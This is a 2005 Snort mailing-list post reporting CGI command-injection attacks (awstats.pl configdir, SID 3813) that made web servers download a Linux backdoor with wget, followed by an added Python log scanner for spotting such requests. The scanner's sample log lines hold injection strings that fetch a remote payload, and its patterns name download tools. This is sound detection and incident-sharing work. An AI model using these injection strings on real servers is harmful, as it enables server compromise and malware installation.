Snort mailing list archives

RE: Worm/Virus related to SID 3813: "WEB-CGI awstats.pl configdir command execution attempt" and other SIDs ?


From: TPanaitescu () colorcon com
Date: Sat, 5 Nov 2005 10:38:24 -0400

Hi again everyone,

Got the same thing a few minutes ago, coming from China this time, pointing 
to the same address for the download .... Seems to be spreading? The 
downloaded file is definitely for Linux.

Tudor

__________________

Hi everyone,

Last night I caught an attack on my web servers here; the attack consisted 
of command execution attempts using various CGI vulnerabilities. The fact 
is that after looking at the payload of all connection attempts, they all 
had a "wget <IP Address>/lupii", same IP address; I can send it to the 
list if anybody needs it. I downloaded the file from that site, it is an 
ELF executable and it seems to be a backdoor of some sort reporting back 
to the site. The attack was coming from Taiwan and the download site was 
in Norway. 

I am not good at looking at ELF format programs, is anybody willing to 
take a look? I can send the file on demand. Does anybody know what 
this is all about?

Thanks,
Tudor
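Added example, not code from the thread or from the Snort project: a small access-log scanner that flags the request pattern Tudor describes (a download tool such as wget invoked through a CGI query, and the awstats.pl configdir parameter carrying shell metacharacters, which is what SID 3813 keys on). The log lines, the function names and the 203.0.113.x / 198.51.100.x addresses are constructed placeholders, not indicators from the thread.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), not from the thread.
# The addresses come from the RFC 5737 documentation ranges and are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Nov/2005:03:12:44 -0400] "GET /cgi-bin/awstats.pl?configdir=%7Cwget%20198.51.100.9/lupii%7C HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [05/Nov/2005:03:12:45 -0400] "GET /cgi-bin/test.cgi?x=;cd%20/tmp;wget%20198.51.100.9/lupii HTTP/1.1" 404 210 "-" "Mozilla/4.0"
192.0.2.10 - - [05/Nov/2005:03:13:01 -0400] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 8100 "-" "Mozilla/5.0"
192.0.2.11 - - [05/Nov/2005:03:14:10 -0400] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Source address, timestamp, method, request URI and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_META = re.compile(r'[|;`&]')          # characters that separate or chain shell commands
DOWNLOAD_RE = re.compile(r'\b(wget|curl|tftp)\b')

def inspect(uri):
    """Return the reasons (possibly none) why this request URI looks like CGI command injection."""
    decoded = unquote(uri)                  # look at the decoded form, as the CGI script would
    path, _, query = decoded.partition('?')
    reasons = []
    if path.endswith('/awstats.pl') and 'configdir=' in query:
        value = query.split('configdir=', 1)[1].split('&', 1)[0]
        if SHELL_META.search(value):
            reasons.append('awstats configdir with shell metacharacters')
    if '/cgi-bin/' in path and SHELL_META.search(query) and DOWNLOAD_RE.search(query):
        reasons.append('download tool invoked through CGI query')
    return reasons

def scan(log_text):
    """Return (source, decoded URI, reasons) for every suspicious request in the log text."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                        # skip lines that are not in combined format
        reasons = inspect(m.group('uri'))
        if reasons:
            hits.append((m.group('src'), unquote(m.group('uri')), reasons))
    return hits

if __name__ == '__main__':
    for src, uri, reasons in scan(SAMPLE_LOG):
        print(src, uri, '; '.join(reasons))
```

A hit whose query names a download tool is also the cue to check outbound proxy or firewall logs for the fetch itself, since the request succeeds silently on a vulnerable host.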
